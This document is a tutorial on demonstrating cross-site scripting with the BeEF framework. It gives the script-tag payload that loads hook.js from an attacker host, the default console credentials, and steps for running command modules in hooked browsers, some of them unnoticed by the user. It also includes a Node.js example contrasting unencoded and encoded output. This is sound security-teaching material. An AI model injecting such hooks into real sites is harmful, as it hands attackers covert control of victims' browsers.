Cross-site Scripting with BeEF Framework


Overview

Cross-site scripting (XSS) and HTML injection occur when user-controlled, and therefore attacker-controlled, input is later incorporated into a web server response without being encoded for the context in which it lands. In other words, the attacker can send input that is then included, unchanged, in the web page another user receives.

Development teams or management might not understand why XSS is such a big deal. Trivial demonstrations such as popping up an alert box do not help in these cases. The Browser Exploitation Framework (BeEF) allows remote control of any browser that has loaded its JavaScript hook, making the demonstration easy, effective and convincing.

Starting BeEF

  • On the attacker machine, open a command prompt.
  • Start BeEF. For example, in Samurai the command is "beef".
  • If unsure where the beef program is located, the "locate beef" command may help.
  • Once BeEF starts, carefully note the "Hook URL" and the "UI URL".
  • The "Hook URL" will be embedded in the cross-site script sent to the user. Save this URL for later.
  • BeEF starts its own web server. The "UI URL" is the address of the administrative console hosted by that server. Open a browser on the attacker host and paste in the "UI URL"; the BeEF administrative console loads as a web page. Log in using "beef" as both the user name and password. These are the default credentials set in BeEF's config.yaml; change them before running BeEF on any network you do not fully control, since the console is reachable from the same server that serves the hook.

Using BeEF
  • Verify the "Hook URL" works. This can be done on the attacker machine: open a web browser and paste in the "Hook URL". The contents of the BeEF JavaScript file hook.js should be displayed. It is quite lengthy and will be obvious.
  • Create a cross-site script with the "Hook URL" as the value of the script tag's "src" (source) attribute:
  • <script src="BEEF HOOK URL GOES HERE"></script>
  • An example is
  • <script src="http://10.0.0.1:3000/hook.js"></script>
  • Inject this cross-site script into a vulnerable input parameter, that is, one whose value is reflected or stored into a page without encoding.
  • The victim's browser downloads and runs hook.js from the attacker host, hooking the browser. hook.js then makes the browser reach back to the attacker machine repeatedly, which is how the browser appears in, and receives commands from, the BeEF administrative console.
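The procedure above depends on the injected tag reaching the page unencoded. The following added example (written for this page, not code from the original or from the BeEF project) shows the sink side of that in plain Node.js: a page that concatenates a query parameter straight into its HTML beside the same page with the parameter HTML-encoded, both fed the tutorial's hook payload. The hook URL is the page's example value; the query-string handling, the htmlEncode helper and the containsHookScript check are assumptions made for the example and are not BeEF functionality. It runs entirely offline.

```javascript
// Added example, not part of the original page or of BeEF.
// Demonstrates why the BeEF hook lands only when output is not encoded.

// Example hook URL from the page (assumed value, not a live server).
const BEEF_HOOK_URL = "http://10.0.0.1:3000/hook.js";

// The payload the tutorial injects: a script tag whose src is the BeEF hook.
const HOOK_PAYLOAD = `<script src="${BEEF_HOOK_URL}"></script>`;

// How the payload would travel in a reflected case: URL-encoded in the query string.
// (Constructed for the example; a real app would parse req.url the same way.)
const ATTACK_QUERY = "name=" + encodeURIComponent(HOOK_PAYLOAD);

// Recover the raw parameter value the way a web framework would.
function getNameParam(queryString) {
  return new URLSearchParams(queryString).get("name") || "";
}

// Vulnerable sink: the parameter is concatenated straight into the response body.
function renderVulnerable(name) {
  return `<html><body><h1>Hello, ${name}!</h1></body></html>`;
}

// Minimal HTML-body encoder (assumed helper; a real app should use its
// framework's templating or a maintained library, not a hand-rolled replace chain).
function htmlEncode(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Hardened sink: same page, parameter encoded for the HTML text context it lands in.
function renderSafe(name) {
  return `<html><body><h1>Hello, ${htmlEncode(name)}!</h1></body></html>`;
}

// Heuristic check a tester can run over a captured response body: is there a
// live <script> element whose src ends in hook.js? (Constructed for this example.)
function containsHookScript(html) {
  return /<script[^>]*\bsrc\s*=\s*["'][^"']*hook\.js["'][^>]*>/i.test(html);
}

// Simulate one request carrying the attack query through a given renderer.
function simulate(renderer, queryString) {
  const body = renderer(getNameParam(queryString));
  return { body, hooked: containsHookScript(body) };
}

const vulnerable = simulate(renderVulnerable, ATTACK_QUERY);
const hardened = simulate(renderSafe, ATTACK_QUERY);
console.log("vulnerable page contains live hook:", vulnerable.hooked);
console.log("hardened page contains live hook:", hardened.hooked);
console.log(hardened.body);
```

The hardened page still shows the attacker's text, which is exactly what a user would see as literal characters, but the browser never parses it as a script element, so hook.js is never fetched. The same reasoning applies to stored XSS: the storage step is irrelevant; what matters is whether the sink encodes on output.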

Controlling Hooked Browsers
  • Look under "Hooked Browsers" in the BeEF interface. Currently hooked browsers appear under Online; browsers whose hook has stopped reaching back move to Offline.
  • Click on a hooked browser to display its details and options.
  • Command modules are listed under the Commands tab. Each module carries a coloured marker; green means the module is known to work against this browser without the user noticing. Other colours indicate that the module may be visible to the user, has not been verified against this browser, or is known not to work.
  • To execute a command, click the command and then "Execute". Note that some commands take parameters, which must be filled in first.
  • The Execute button is in the lower right corner.
  • Command output can be viewed by clicking the respective record in the "Module Result History" tab. Results arrive the next time the hooked browser reaches back, so there may be a short delay before they appear.